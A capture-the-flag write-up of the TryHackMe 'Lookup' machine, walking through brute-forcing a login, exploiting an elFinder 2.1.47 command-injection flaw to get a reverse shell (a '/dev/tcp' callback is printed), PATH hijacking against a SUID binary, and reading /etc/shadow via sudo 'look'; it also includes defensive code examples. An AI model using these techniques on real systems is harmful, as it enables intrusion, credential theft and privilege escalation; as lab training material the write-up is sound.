Lookup Writeup (TryHackMe Easy Machine)

Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices.


Overview

Lookup is an easy Linux machine from TryHackMe. It is a beginner-friendly box that tests the most basic cybersecurity skills, and the challenges in this room are very common in other CTFs as well.

We start with login page brute-forcing, which leads to access to the “elFinder” file manager. We exploit a known RCE vulnerability in it and get an initial foothold on the machine.

Once inside, we modify the PATH variable so that a SUID binary executes our malicious script, which compromises another user. Finally, we abuse that user’s sudo permission over the “look” binary and get root.


Nmap scan

Starting with an Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.194.175 -T5
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 15:27 EDT
Warning: 10.10.194.175 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.194.175
Host is up (0.063s latency).
Not shown: 971 closed tcp ports (reset), 27 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 124.85 ms 10.9.0.1
2 124.90 ms 10.10.194.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

The Nmap scan showed 2 open ports: port 22 for SSH and port 80 for an Apache HTTP server. Note the “Did not follow redirect to http://lookup.thm” line in the output: don’t forget to add the “lookup.thm” domain to your “/etc/hosts” file.


Web enumeration

When I visited the website, I was greeted with a login form. A closer inspection of the page source showed that the form is handled by PHP in the background.


I ran both Gobuster and FFuF to perform directory and subdomain enumeration, but got no results back. After that, I tried some common credentials to test the login functionality, and found that the server response differs for existing and non-existing users.

non-existing username, response showing “wrong username”

For example, user “admin” seems to be present on the web server.

existing username, response showing “wrong password”
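The finding above is a classic username-enumeration bug: the error message itself tells you whether the account exists. The following is an added example, not code from the box or the room author, showing the observed behaviour next to a hardened login routine that returns one generic message and does the same hashing work on both failure paths. The user store and passwords are constructed for the demo.

```python
import hashlib
import hmac
import os


def _hash(password: str, salt: bytes) -> bytes:
    # PBKDF2 with a modest iteration count so the demo runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


def _record(password: str):
    salt = os.urandom(16)
    return salt, _hash(password, salt)


# Constructed sample user store: {username: (salt, hash)}. Not the box's real credentials.
USERS = {"admin": _record("constructed-pw-1"), "jose": _record("constructed-pw-2")}
# Dummy record checked when the user does not exist, so unknown users cost the same time.
_DUMMY = _record("dummy")


def login_vulnerable(username: str, password: str) -> str:
    """The behaviour observed on lookup.thm: the message reveals whether the user exists."""
    if username not in USERS:
        return "Wrong username"
    salt, stored = USERS[username]
    if not hmac.compare_digest(stored, _hash(password, salt)):
        return "Wrong password"
    return "Login OK"


def login_hardened(username: str, password: str) -> str:
    """One generic message for both failure cases, and the same work done on each path."""
    salt, stored = USERS.get(username, _DUMMY)
    matched = hmac.compare_digest(stored, _hash(password, salt))
    if username in USERS and matched:
        return "Login OK"
    return "Wrong username or password"


if __name__ == "__main__":
    for user in ("nobody", "admin"):
        print(f"{user:>7}: vulnerable -> {login_vulnerable(user, 'x')!r}, "
              f"hardened -> {login_hardened(user, 'x')!r}")
```

A uniform message only closes the enumeration channel; stopping the password brute-force that follows still needs rate limiting or account lockout, which this example does not implement.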


Based on this finding, it’s possible to brute-force the password. I used Hydra, an online (network login) password cracking tool, which has password spraying capabilities as well.

Hydra screamed with a finding. But when I tried these credentials, nothing happened.

That was very weird: the response now said wrong username, too. In desperation, I tried password spraying with Hydra to see if that would do anything, and it did.

I got a match with another user named “jose”. Hopefully, this one will work.


Exploiting RCE in elFinder & getting reverse shell

When I tried to log in as “jose”, I got redirected to a different subdomain, “files.lookup.thm”.

I got an error. That’s because the browser doesn’t know how to reach that website. We have to add the “files.lookup.thm” subdomain to our “/etc/hosts” file for the website to load properly.


After that, I was greeted with “elFinder”, which seemed to be a file manager application.

elFinder is an open-source web-based file manager. It’s designed to allow users to manage files and folders on a server through a graphical interface similar to a desktop file manager like Windows Explorer or macOS Finder — but accessible in a browser. (ChatGPT)

There were also files like “root.txt” and “admin.txt”, but with seemingly random content.

stored files showing seemingly random content

I was digging for a bit and found the version of elFinder in use: version 2.1.47.


I did some research on “elFinder 2.1.47” and found a PHP connector RCE exploit. I found this GitHub repository with a Python exploit: https://github.com/hadrian3689/elFinder_2.1.47_php_connector_rce.

I downloaded the exploit, provided the necessary parameters (target URL, listener host and port) and ran it. And I got the shell.

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py -t "http://files.lookup.thm/elFinder/" -lh 10.9.2.141 -lp 1234
CVE-2019-9194 elFinder 2.1.47 - PHP connector Command Injection
Uploading image
Gettin file hash: l1_cnNlLmpwZztlY2hvIDNjM2Y3MDY4NzAyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzMjI1ZDI5M2IyMDNmM2UwYSB8eHhkIC1yIC1wID4gcnNlLnBocDsgIy5qcGc
Rotating image
Requesting shell at http://files.lookup.thm/elFinder/php/rse.php?c=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.9.2.141/1234%200>%261'


Modifying PATH variable to execute malicious script & getting user flag

I checked the SUID binaries and found an unusual binary called “pwm”.

I ran the “pwm” binary, which ran the “id” command to extract my username and then tried to print my “.passwords” file. User “think” has such a file in his home directory. Maybe another password list.

www-data@lookup:/$ pwm
pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found


Inspecting the binary with “strings”, we can deduce that the “id” command is run without an absolute path (like “/usr/bin/id”). When no absolute path is given, the system searches the directories listed in the “PATH” environment variable, in order, for a binary of that name.

We can abuse this by putting the “/tmp” directory into the PATH variable and creating our own “id” script there, which simply prints a fake “uid=1000(think)” line. “pwm” parses that output as user “think”, so it should print his “.passwords” file.

Firstly, I created my malicious “id” script inside the “/tmp” directory.

www-data@lookup:/tmp$ echo -e '#!/bin/bash\necho "uid=1000(think)"' > id
echo -e '#!/bin/bash\necho "uid=1000(think)"' > id
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo "uid=1000(think)"
www-data@lookup:/tmp$ chmod +x id
chmod +x id

Secondly, I put the “/tmp” directory at the front of the PATH variable, so it is searched before the real system directories. (Running “$PATH” as a command fails, but the error message conveniently shows the new value.)

www-data@lookup:/$ export PATH="/tmp:$PATH"  
export PATH="/tmp:$PATH"
www-data@lookup:/$ $PATH
$PATH
bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory

Finally, I ran the “pwm” binary again. As expected, it gave me think’s password list.
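The root cause of the whole PATH trick is that a privileged program resolved “id” through a caller-controlled search path. The following is an added example, not code from the box or its author, that rebuilds the situation in temporary directories (a world-writable directory standing in for “/tmp”, a private one standing in for “/usr/bin”) and contrasts the lookup a bare system("id") performs with a hardened resolver that ignores the caller’s PATH, uses a fixed secure path like the one sudo enforces on this box, and refuses any directory other users can write to. Directory names and the fake “id” scripts are constructed for the demo.

```python
import os
import shutil
import stat
import tempfile

# Fixed search path for privileged helpers (mirrors sudo's secure_path on this box).
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_like_pwm(cmd: str, caller_path: str):
    """What a bare system("id") does: first executable match in the caller's PATH."""
    return shutil.which(cmd, path=caller_path)


def is_untrusted_dir(directory: str) -> bool:
    """A directory that is missing, or writable by group/others, must never be searched."""
    try:
        mode = os.stat(directory).st_mode
    except FileNotFoundError:
        return True
    return bool(mode & (stat.S_IWOTH | stat.S_IWGRP))


def resolve_hardened(cmd: str, secure_path: str = SECURE_PATH):
    """Ignore the caller's PATH entirely; walk only the fixed list, skipping untrusted dirs."""
    for directory in secure_path.split(os.pathsep):
        if is_untrusted_dir(directory):
            continue
        candidate = os.path.join(directory, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def _fake_tool(directory: str, name: str, marker: str) -> str:
    """Constructed stand-in for a command: a script that only echoes a marker."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(f"#!/bin/sh\necho {marker}\n")
    os.chmod(path, 0o755)
    return path


def demo():
    """World-writable dir listed ahead of a private one, as /tmp was ahead of /usr/bin on the box."""
    shadow_dir = tempfile.mkdtemp(prefix="shadow-")   # plays /tmp
    os.chmod(shadow_dir, 0o1777)                      # world-writable with sticky bit, like /tmp
    real_dir = tempfile.mkdtemp(prefix="real-")       # plays /usr/bin (mode 0700 here)
    _fake_tool(shadow_dir, "id", "shadowed")
    _fake_tool(real_dir, "id", "genuine")
    path = f"{shadow_dir}{os.pathsep}{real_dir}"
    # The hardened resolver gets the same list as its fixed path here, so the
    # writable-directory check alone is what keeps it off the shadowed copy.
    return resolve_like_pwm("id", path), resolve_hardened("id", path)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable lookup ->", vulnerable)
    print("hardened lookup   ->", hardened)
```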


I used Hydra again, this time with that list, to brute-force the SSH login for user “think”. And I got a match.

I logged in as “think” via SSH. The user flag can be grabbed easily now.


Abusing sudo permission over “look” binary & getting root flag

I immediately ran “sudo -l” to check my user’s sudo permissions. I could run the “look” binary with sudo.

think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
(ALL) /usr/bin/look

I tested this binary’s functionality to get a better understanding of it. By default it reads the file “/usr/share/dict/words”, which did not exist on this machine.

think@lookup:~$ sudo /usr/bin/look
usage: look [-bdf] [-t char] string [file ...]
think@lookup:~$ sudo /usr/bin/look abcdef
look: /usr/share/dict/words: No such file or directory


It took me a moment to realize that “look” is actually a common pre-installed binary on Linux. I went to GTFOBins, which lists privilege escalation techniques for common Linux binaries.

I just had to run it with an empty string as the search prefix and whatever file I wanted to read as the file argument. I chose “/etc/shadow”.

With this, you can read the root flag. You can also root the machine by displaying root’s private key the same way and logging in with it.


Summary

Lookup is an easy machine from TryHackMe. This box challenges you with common CTF problems: abusing sudo permissions, modifying the PATH variable, exploiting an RCE in known software and login brute-forcing are all things you can practice on this machine. I liked all the different stages of this box, but got a little bored with all the brute-forcing, which is definitely common in cybersecurity, but not really fun. Recommended for anyone just getting started in cybersecurity and CTFs; maybe a little too easy for experienced people.
